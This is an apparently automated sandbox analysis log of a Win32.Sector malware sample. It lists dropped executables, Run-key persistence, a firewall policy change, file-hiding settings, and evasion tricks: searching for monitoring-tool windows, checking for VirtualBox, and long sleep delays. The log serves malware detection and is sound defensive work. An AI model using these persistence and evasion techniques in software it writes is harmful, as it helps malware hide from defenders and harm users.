        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_014BF200 push ss; ret 1_2_014BF204
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_014BF217 push ds; ret 1_2_014BF222
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00976690 push eax; ret 10_2_009766BE
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00D10000 push ebp; mov dword ptr [esp], eax10_2_00D1000F
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00D10000 push 5489B728h; mov dword ptr [esp], ebx10_2_00D100A6
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00411059 push esp; ret 18_2_0041105A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040E269 push esp; ret 18_2_0040E26A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00411E21 push esp; ret 18_2_00411E22
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040B030 push eax; ret 18_2_0040B05E
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040F031 push esp; ret 18_2_0040F032
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040F4C9 push esp; ret 18_2_0040F4CA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_004114F1 push esp; ret 18_2_004114F2
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00413081 push esp; ret 18_2_00413082
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00410291 push esp; ret 18_2_00410292
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_004122B9 push esp; ret 18_2_004122BA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00412751 push esp; ret 18_2_00412752
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040F961 push esp; ret 18_2_0040F962
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040E701 push esp; ret 18_2_0040E702
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00410729 push esp; ret 18_2_0041072A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00410BC1 push esp; ret 18_2_00410BC2
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00412BE9 push esp; ret 18_2_00412BEA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040FDF9 push esp; ret 18_2_0040FDFA
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00411989 push esp; ret 18_2_0041198A
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_0040EB99 push esp; ret 18_2_0040EB9A
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 41_2_007B1AB7 push ds; ret 41_2_007B1AC2
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 41_2_007B1AA0 push ss; ret 41_2_007B1AA4
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 42_2_012B1AA0 push ss; ret 42_2_012B1AA4
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 42_2_012B1AB7 push ds; ret 42_2_012B1AC2
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeCode function: 43_2_00791AB7 push ds; ret 43_2_00791AC2
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name: entropy: 7.9613934272864615
        Source: winfpnht.exe.1.drStatic PE information: section name: .text entropy: 7.984275082441756
        Source: winmxfy.exe.1.drStatic PE information: section name: .text entropy: 7.985345441502574
        Source: voiv.exe.1.drStatic PE information: section name: .text entropy: 7.985345441502574
        Source: jvauyc32.exe.1.drStatic PE information: section name: entropy: 7.9613934272864615
        Source: rckc.exe.10.drStatic PE information: section name: .text entropy: 7.984175636605872
        Source: winkvnav.exe.10.drStatic PE information: section name: .text entropy: 7.986568277217242
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: C:\Users\user\AppData\Local\Temp\winkvnav.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: C:\Users\user\AppData\Local\Temp\rckc.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Local\Temp\winmxfy.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Local\Temp\winfpnht.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\voiv.exeJump to dropped file

        Boot Survival

        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Registry key monitored: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Window searched: window name: RegmonClass
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Window searched: window name: FilemonClass
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Window searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Window searched: window name: Regmonclass
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Window searched: window name: Filemonclass
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Window searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: RegmonClass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: FilemonClass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: Regmonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: Filemonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: Regmonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: RegmonClass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: FilemonClass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: Regmonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: Filemonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window searched: window name: Regmonclass
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run jvauyc32.exe
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run jvauyc32.exe

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; File opened: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe:Zone.Identifier read attributes | delete
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Binary or memory string: KeServiceDescriptorTable
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; System information queried: FirmwareTableInformation
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; System information queried: FirmwareTableInformation
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; System information queried: FirmwareTableInformation
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
        Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
        Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Code function: 18_2_00401363 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 180000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 300000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 360000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 1800000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 300000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 180000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 360000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 1800000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 600000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 900000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 1800000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window / User API: threadDelayed 932
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window / User API: threadDelayed 6586
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Window / User API: threadDelayed 495
        Source: C:\Windows\explorer.exe; Window / User API: foregroundWindowGot 748
        Source: C:\Windows\explorer.exe; Window / User API: foregroundWindowGot 724
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_18-5362
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_1-7701
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winkvnav.exe
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rckc.exe
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winmxfy.exe
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winfpnht.exe
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Dropped PE file which has not been started: C:\voiv.exe
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes graph_10-590
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 2228; Thread sleep time: -120000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 2240; Thread sleep time: -180000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6532; Thread sleep time: -300000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6340; Thread sleep time: -62505s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 2240; Thread sleep time: -240000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 4452; Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6212; Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6212; Thread sleep time: -98000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6284; Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 6284; Thread sleep time: -2880000s >= -30000s
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe TID: 2240; Thread sleep time: -1800000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992; Thread sleep time: -90000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 1868; Thread sleep time: -48000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992; Thread sleep count: 932 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992; Thread sleep time: -477184s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7424; Thread sleep time: -62965s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7440; Thread sleep time: -300000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7420; Thread sleep time: -180000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7424; Thread sleep count: 53 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7420; Thread sleep time: -1080000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7428; Thread sleep time: -120000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7488; Thread sleep count: 44 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7488; Thread sleep time: -880000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7492; Thread sleep count: 56 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7492; Thread sleep time: -1120000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7492; Thread sleep time: -1440000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7440; Thread sleep count: 48 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7420; Thread sleep time: -19800000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7424; Thread sleep time: -600000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7416; Thread sleep time: -900000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992; Thread sleep count: 6586 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 6992; Thread sleep time: -3372032s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 8092; Thread sleep count: 495 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 8088; Thread sleep time: -3600000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7744; Thread sleep count: 164 > 30
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe TID: 7744; Thread sleep time: -1640000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 2416; Thread sleep time: -1510000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 2444; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6476; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7928; Thread sleep count: 149 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7928; Thread sleep time: -1490000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7924; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 1964; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6024; Thread sleep count: 148 > 30
